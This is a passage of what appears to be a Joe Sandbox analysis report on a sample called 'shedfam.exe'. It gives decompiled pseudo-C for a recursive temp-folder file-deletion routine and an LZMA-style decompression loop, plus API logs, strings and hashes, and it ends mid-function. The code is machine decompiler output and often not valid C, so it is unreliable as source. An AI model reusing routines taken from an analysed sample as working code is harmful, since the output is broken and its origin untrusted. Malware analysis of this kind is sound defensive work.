C-Code - Quality: 94%

			E00405620(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004058CF(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x424008 =  *0x424008 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405CFB(0x421588, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405835(_t72);
					} else {
						lstrcatA(0x421588, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
						_t37 = FindFirstFileA(0x421588,  &_v332); // executed
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405819( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405CFB(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004059B3(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404FE7(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x424008 =  *0x424008 + 1;
										} else {
											E00404FE7(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E00405A49(__eflags);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405620(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4); // executed
						goto L29;
					}
					__eflags =  *0x421588 - 0x5c;
					if( *0x421588 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405FF6(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004057EE(_t72);
							E004059B3(_t72);
							_t37 = RemoveDirectoryA(_t72); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404FE7(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404FE7(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E00405A49(__eflags);
						}
						L33:
						 *0x424008 =  *0x424008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x0040562b
0x0040562f
0x00405638
0x0040563b
0x0040563e
0x00405646
0x00405648
0x00405649
0x00000000
0x00405649
0x00405658
0x00405658
0x0040565b
0x0040565e
0x00405672
0x00405679
0x0040567e
0x00405680
0x00405690
0x00405682
0x00405688
0x00405688
0x00405695
0x00405698
0x004056a3
0x004056a9
0x004056ae
0x004056be
0x004056c0
0x004056c6
0x004056c9
0x004056cc
0x00405789
0x00405789
0x0040578d
0x0040578f
0x0040578f
0x0040578f
0x0040578f
0x00000000
0x00000000
0x00000000
0x00000000
0x004056d2
0x004056d2
0x004056db
0x004056e1
0x004056e6
0x004056e9
0x004056eb
0x004056ef
0x004056f1
0x004056f1
0x004056ef
0x004056f4
0x004056f7
0x0040570a
0x0040570c
0x00405711
0x00405718
0x00405730
0x00405736
0x0040573c
0x0040573e
0x00405763
0x00405740
0x00405740
0x00405744
0x00405758
0x00405746
0x00405749
0x0040574e
0x00405750
0x00405751
0x00405751
0x00405744
0x0040571a
0x00405720
0x00405722
0x00405728
0x00405728
0x00405722
0x00000000
0x00405718
0x004056f9
0x004056fc
0x004056fe
0x00000000
0x00000000
0x00405700
0x00405702
0x00000000
0x00000000
0x00405704
0x00405708
0x00000000
0x00000000
0x00000000
0x00405768
0x00405772
0x00405778
0x00405778
0x00405783
0x00000000
0x00405783
0x0040569a
0x004056a1
0x00000000
0x00000000
0x00000000
0x00405660
0x00405660
0x00405662
0x00405793
0x00405796
0x00405799
0x004057eb
0x004057eb
0x004057eb
0x0040579b
0x0040579e
0x004057a9
0x004057ae
0x004057b0
0x00000000
0x00000000
0x004057b3
0x004057b9
0x004057bf
0x004057c5
0x004057c7
0x00000000
0x004057e3
0x004057c9
0x004057cd
0x00000000
0x00000000
0x004057d2
0x004057d7
0x004057d8
0x00000000
0x004057d9
0x004057a0
0x004057a0
0x00000000
0x004057a0
0x00405668
0x0040566c
0x00000000
0x00000000
0x00000000
0x0040566c

APIs

DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 0040563E
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405688
lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 004056A9
lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 004056AF
FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 004056C0
FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00405772
FindClose.KERNELBASE(?), ref: 00405783

Strings

"C:\Users\user\Desktop\shedfam.exe", xrefs: 00405620
C:\Users\user\AppData\Local\Temp\, xrefs: 0040562A
\*.*, xrefs: 00405682
C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*, xrefs: 00405672, 00405678, 00405687, 004056BD

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\shedfam.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*$\*.*
API String ID: 2035342205-995754795
Opcode ID: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
Instruction ID: d22bf5e118ddec5917fccaaf7686bbc93ae223f9f66f108bf4c644a40ea6f6a4
Opcode Fuzzy Hash: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
Instruction Fuzzy Hash: 5C510630404B44A6DB217B218C85BBF7AA8DF92319F14817BF945B61D1C73C4982EE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00406333 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406333() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
